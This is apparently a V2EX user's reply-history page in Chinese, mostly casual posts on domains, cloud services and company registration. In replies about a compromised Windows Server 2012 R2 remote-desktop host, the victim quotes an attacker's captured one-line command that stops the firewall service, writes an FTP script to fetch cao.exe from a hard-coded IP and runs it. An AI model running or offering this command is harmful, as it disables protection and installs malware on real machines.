V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  wkl17  ›  全部回复第 3 页 / 共 11 页
回复总数  218
1  2  3  4  5  6  7  8  9  10 ... 11  
@yw9381
@mmdsun
@QQ2171775959
@CallMeReznov
@visonme
没有跑 Web 服务,MySQL 当时也没运行,而且我通过 HIPS 工具阻止了从公网访问 3306。默认的 3389 也早就改掉了。
或者,假如想分析对方究竟是利用什么漏洞来入侵的,各位可有分析的方法或工具分享一下?谢谢。
@delectate 请再看看我上楼补充的内容。我粗看了 Windows 系统日志,应用程序、安全、系统 这 3 项日志没有发现什么明显异常的日志信息。而且文件读取记录肯定也不会记录在 Windows 系统日志的。服务器也没有跑 Web,所以 i 也没有 Web 日志。

我遇到的情况跟百度知道那个问题很像,也是先尝试 net1 stop sharedaccess (不过被 HIPS 阻止了)。
各位认为对方执行这样的命令,可能是通过什么漏洞来实现的?

服务器是 2K12 R2,除了 R2 的近 900MB 的补丁和 xx 月恶意软件删除工具 没打,其它的补丁很久以前都打过了。

因为也没跑 web,所以打了补丁后 也没做更多的优化,只是使用 HIPS 类软件控制联网(需手工放行)

但我刚才 netstat,发现 137、138、445 的端口还是处于监听状态。不过我也测试了从外网 telnet,

确认这几个端口无法从外网通讯。(应该是被防火墙挡下了)。
或者更直接一点说吧。有一台作为远程桌面用的 Windows,没跑什么服务。

但我今天发现 cmd 命令行有些异常命令(因为执行某个不存在的 exe 卡住了,所以我通过 procexp 查看到这个异常命令)。

刚搜了一下,命令就像这个 2011 年的百度知道问题:

https://zhidao.baidu.com/question/263547971.html

有个 cmd 尝试执行 ftp 命令行下载某个 exe 程序 并执行。但好在我服务器安装了普通的 HIPS,

根据 HIPS 软件的日志,已成功阻止了它下载。虽然也没什么重要数据,但我好奇的是,

这个入侵者能执行类似这样的命令:c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 117.41.184.58> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe

那服务器上的某个文件(比如刚才举例的 abc.txt )如果被入侵者下载或读取过,是否有办法判断出来?
https://i.imgur.com/xiWGZ93.png

为何 V2EX 发 imgur 的图片,有时可以自动解析,有时却不行?
如果是显示器护眼的话,推荐一个软件:f.lux
投影仪 感觉看久易犯困。另外,我以前也想过将投影仪用于展示 Server Monitor,但是很多人说这样很容易用废,如果要 7x24 小时、长时间运行的话。
2019-02-26 03:42:33 +08:00
回复了 wkl17 创建的主题 酷工作 [创业]IT 行业能否完全线上办公?(避免长驻办公处?)
@Sapp 企业银行开户 我已经开户下来了。这些前期要处理的 我会先去现场处理好。
主要是想了解,后期正式营业后,能否都线上办公。谢谢。
2019-02-26 03:40:02 +08:00
回复了 wkl17 创建的主题 厦门 有厦门软件人才引进政策落户厦门的么?分享下经验?
@bestkayle 不一定是为了买房啊,厦门户口还能享受到其他一些利好吧。
@pmsg863 非常感谢!我年前在思明注册了一个公司(一共 2 个股东,我是法人),不过是 solo 型的(也就是面积很小的,专门用于注册公司的),因为我做的是 IT 服务。不知道我这样的情况,公司地址是否也能用于挂靠落户呢?还是说公司集体户 对应的地址,有产权之类的要求?我的公司地址 只是合同期 1 年租赁的。如了解这方面的情况 请帮忙也解答一下,感谢!
国内注册商怎么突然都不支持注册 .pw 域名了?我刚刚查了 西部数码 阿里云万网 易名 都没看到 pw 后缀。

你们最近见过的哪家 pw 续费很便宜的?推荐一下?刚查了 name.com 的价格,要 22.99$ (约 153 元)
2019-02-24 06:20:31 +08:00
回复了 mamahaha 创建的主题 程序员 当下最有可能暴富的人群里,比例最大的是程序员吗?
@w2cny 笑。。网上( ZF 类网站)会有相关案例 详细公示出来么?
2019-02-24 04:08:23 +08:00
回复了 Jessepinkman 创建的主题 全球工单系统 李彦宏你觉得非会员的百度盘下载速度能接受吗?
没有恶意,只是突然好奇:那些在怼楼主的,大多数 月薪几何?
假设按区间划分,比如 3~10K 为 1 ; 11~20K 为 2,以此类推?
很想验证下 观念与薪酬 是否有存在某种关系。
当然你们如果认为有隐私因素的话 那就罢了
(虽然我已经尝试以区间来降低敏感)
楼主帮忙 APPEND 一下本楼的内容?
2019-02-24 04:00:53 +08:00
回复了 Jessepinkman 创建的主题 全球工单系统 李彦宏你觉得非会员的百度盘下载速度能接受吗?
@Hazurt 蒙牛 是什么?
@davelm 是哪家的 1T 大盘鸡?是否有信誉 真能让用户 用到 1T ?
2019-02-24 00:54:24 +08:00
回复了 wkl17 创建的主题 酷工作 [创业]IT 行业能否完全线上办公?(避免长驻办公处?)
@iloy 工商是指工商局么?工商局和银行 主要是哪些事务需要去办理?银行 感觉网银应该都能搞定?
2019-02-24 00:53:05 +08:00
回复了 DavidNineRoc 创建的主题 问与答 这种加密源码的系统到底是怎么运行的?
楼主 成功解蜜了吗?我这也有个 php 文件用到这个 sg_load
2019-02-23 20:14:42 +08:00
回复了 wkl17 创建的主题 酷工作 [创业]IT 行业能否完全线上办公?(避免长驻办公处?)
上面的图片不支持显示。改用 imgur 了。囧。
https://i.imgur.com/ETZ7xai.png
2019-02-23 01:40:23 +08:00
回复了 lupo 创建的主题 全球工单系统 阿里云的主机 ssh 一段时间不操作怎么就卡住断线了
感觉是运营商或者 IDC 商网络不稳定吧。

我在服务器上连接另一个服务器(同机房),几天都不会断线。

但是用疼训云,RDP,经常一段时间断一下 重连一下。体验很不爽。

所以感觉是客户端网络 或 服务端网络有问题。只是凭使用经验判断,具体没去深入分析过。
2019-02-23 01:34:04 +08:00
回复了 wkl17 创建的主题 问与答 扫二维码码专利费?
害我把文章链接给删了 忘加。

[日本要向中国收二维码使用费?发明公司官网显示免费|QR 码|二维码|使用费_新浪新闻
]( http://news.sina.com.cn/o/2019-02-22/doc-ihqfskcp7630895.shtml)
@theks 只在阿里注册过域名,是否也有免费 1000 条报警短信?还是必须有开通 ECS 等才有?
@lhx2008 我怎么感觉 CF 对于三大运营商而言,移动访问才是最快的?电 /联都要绕美。

考虑去撸一个 GCP 来体验看看。各位都用来做什么?目前能想到的就是跑网站。
2019-02-18 01:47:16 +08:00
回复了 k9982874 创建的主题 问与答 撸到 2300 多谷哥 Cloud 的 Free Credit,有点慌
@trys1 你们说的 nga 群是什么 IM 群?
1  2  3  4  5  6  7  8  9  10 ... 11  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1054 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 28ms · UTC 20:03 · PVG 04:03 · LAX 12:03 · JFK 15:03
Developed with CodeLauncher
♥ Do have faith in what you're doing.